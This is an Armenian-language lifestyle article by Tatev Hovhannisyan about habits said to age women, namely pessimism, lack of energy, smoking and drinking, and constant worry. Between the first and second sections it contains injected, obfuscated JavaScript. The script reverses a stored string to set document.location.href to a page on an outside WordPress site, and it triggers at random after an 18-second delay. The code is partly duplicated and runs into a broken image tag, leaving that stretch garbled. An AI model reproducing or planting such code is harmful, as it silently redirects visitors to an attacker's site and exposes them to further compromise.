
Ի՞նչն է ծերացնում կնոջը. Մաս 2
Արտաքինին վերաբերող հիմնական կետերին ծանոթացանք նախորդ հոդվածում։ Այսօր խոսելու ենք պահվածքի և սովորությունների մասին, որոնք ծերացնում են կնոջը։
Վատատեսություն
Նեգատիվ տրամադրվածությունը, մշտապես դժգոհ լինելու բնավորությունը, մյուսներին անդադար քննարկելու և քննադատելու սովորությունը ոչ միայն կյանքի որակի վրա է ազդում, այլ նաև՝ արտաքին տեսքի։ Հենց էնպես չի ասվում՝ ժպիտը գեղեցկացնում է մարդուն։ Իսկապես ժպիտը տալիս է աչքերին փայլ, ձգում դեմքի մկանները վեր։ Նկատած կլինեք, երբ հեռախոսով խոսելիս զրուցակիցը ժպտում է, ձայնն ավելի հաճելի է դառնում։ Այս կետը վերաբերում է նաև սոց. կայքերում մշտապես բացասական քոմենթներ գրող, ամենուր վեճ փնտրող կանանց, ովքեր սեփական օրը լցնելու, որևէ բան ստեղծելու կամ պարզապես ընկերների ու անծանոթների հետ զրուցելու փոխարեն փչացնում են իրենց հանդեպ վերաբերմունքն ու տպավորությունը, ինչպես նաև դիմացինի տրամադրությունը։
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock_26699109_MEDIUM-1024×768.jpg” alt=”” width=”960″ height=”720″ />
Կենսուրախություն/ էներգիա
Այս կետը ևս նախորդի շարունակությունն է։ Կենսուրախ մարդը, ով պատրաստ է ուսումնասիրել աշխարհը, ձեռք բերել իր անձի համար դեռևս չբացահայտված գիտելիքներ, ընդունակ է գնահատել և ուրախանալ մանրուքներով և շրջապատին վարակել իր հետաքրքրասիրությամբ ու էներգիայով։ Նման մարդիկ առավել երիտասարդ են երևում քան մարդիկ, ովքեր չունեն ցանկություն սեփական աշխարհից այն կողմ ոտք դնելու։
Ծխախոտ
Հաջորդ կետը ծխող և ալկոհոլ օգտագործող մարդիկ են, ովքեր բացի վիզուալ ավելի տարիքով երևալուց նաև ժամանակի ընթացքում մաշկային խնդիրների առաջ են կանգնում՝ գունատություն, թառամած մաշկ, կնճիռներ և այլն։ Խոսքը ռեգուլյար և նորմայից շատ ալկոհոլ օգտագործողների մասին է։ Ծխախոտը ևս մի քանի տարի մեծ է ցույց տալիս կնոջը։
Հոգսառատություն
Հոգսերի մեջ խրված, մշտապես խնդիրներով ապրող, կյանքից հաճույք չստացող, սեփական անձին մի կողմ դրած և այլոց հոգսերը հոգացող կինը իր տարիքից շատ ավելի ծեր է երևում։ Սոցիալական վիճակը մեծագույն ազդեցություն ունի կնոջ տեսքի վրա։ Բնականաբար հոգսեր կան ամեն ընտանիքում, բայց խնդիրների մեծ մասը ժամանակի ընթացքում լուծելի են, հատկապես հիմա, իսկ երիտասարդ կյանքը շատ արագ է անցնում։ Վերանայելով մեր անցկացրած ժամանակը՝ պետք է ճանաչենք ինքներս մեզ, ցուցադրենք մեր լավագույն կողմերը, զբաղվենք հետաքրքիր գործունեությամբ՝ տեղ տալով նոր գիտելիքներին։ Պետք է անել այն ամենը, ինչը վաղուց եք երազում և դեռ համարձակություն չեք գտնում իրագործելու։
Հեղինակ՝ Տաթև Հովհաննիիսյան